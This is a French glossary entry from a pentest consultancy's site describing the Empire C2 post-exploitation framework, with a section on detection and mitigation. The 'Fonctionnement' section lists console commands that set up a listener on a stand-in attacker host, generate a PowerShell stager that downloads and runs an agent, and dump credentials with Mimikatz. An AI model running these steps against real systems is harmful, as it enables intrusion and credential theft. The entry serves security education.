Empire C2
hackingDéfinition
Empire est un framework de post-exploitation PowerShell (puis Python 3 avec BC-Security Empire fork) conçu pour les opérations Red Team. Initialement développé par Will Schroeder (harmj0y) et d'autres membres de l'équipe PowerShell Empire, il est maintenant maintenu par BC Security. Empire se distingue par son accent sur PowerShell et les agents Python, avec des communications chiffrées et des modules de post-exploitation couvrant : la reconnaissance AD (PowerView), l'escalade de privilèges, le credential access (Invoke-Mimikatz), le mouvement latéral, et l'exfiltration. L'architecture comprend un serveur C2, des listeners (HTTP, HTTPS, DNS, Malleable HTTP), et des agents déployés sur les systèmes compromis. L'approche fileless d'Empire (PowerShell en mémoire, pas de binaires sur disque) a fait sa popularité : les agents Empire sont déployés via des one-liners PowerShell (stagers) qui téléchargent et exécutent l'agent entièrement en mémoire, sans toucher le disque. Des stagers variés permettent la livraison via Office macros, HTA, DLL, et scripts réguliers. Empire a été largement utilisé dans des opérations APT réelles : des rapports gouvernementaux ont documenté des groupes APT (dont des acteurs russes et nord-coréens) utilisant des modules Empire dans leurs opérations. Cette notoriété a conduit à l'intégration de signatures Empire dans la plupart des solutions EDR. La version BC Security Empire 4.x a modernisé le framework avec des modules Python 3, une meilleure évasion AMSI, et des intégrations avec des outils comme Covenant, Metasploit et Sliver via des modules de stager communs.
Fonctionnement
Setup serveur Empire : python3 empire --rest. Via l'interface : créer un listener HTTPS (uselistener https → set Host https://attaquant.com → execute), générer un stager (usestager windows/launcher_bat → set Listener https_listener → generate). Le stager est un one-liner PowerShell qui télécharge et exécute l'agent. Une fois l'agent actif : usemodule powershell/credentials/mimikatz/logonpasswords → execute pour dumper les credentials.
Exploitation offensive
Empire est particulièrement efficace dans les environnements Windows avec PowerShell actif. Ses modules PowerView couvrent exhaustivement la reconnaissance Active Directory (cartographie des domaines, objets AD, ACLs, SPNs pour Kerberoasting). L'intégration de modules de mouvement latéral (InvokeWMICommand, Invoke-PSRemoting) permet de propager l'agent Empire à travers le réseau sans binaires supplémentaires.
Détection et mitigation
Les signatures Empire sont largement intégrées dans les EDR (CrowdStrike, Defender for Endpoint) et dans les règles Sigma/YARA. Script Block Logging et Module Logging PowerShell capturent le code Empire même après bypass AMSI. PowerShell Constrained Language Mode (CLM) via AppLocker/WDAC limite significativement les modules Empire qui dépendent des fonctionnalités du langage complet.
Articles liés
Expert en cybersécurité offensive et intelligence artificielle. Pentest, audit et développement IA sur-mesure.
Services
- Audit Infrastructure
- Audit Kubernetes
- Audit Microsoft 365
- Audit Sécurité Réseau
- Analyse de Risques
- Audit Active Directory
- Audit Application Web
- Audit Cloud (AWS/Azure/GCP)
- Audit Messagerie
- Audit API (OWASP Top 10)
- Audit DevSecOps & CI/CD
- Audit Code Source (SAST)
- Audit Postes de Travail
- Audit Sauvegarde & Résilience
- Audit OT/SCADA (IEC 62443)
- Développement IA
- Formations
Ressources
Projets & Outils
© 2026 Ayi NEDJIMI Consultants. Tous droits réservés.
Un projet cybersécurité ?
Expert dispo · Réponse 24h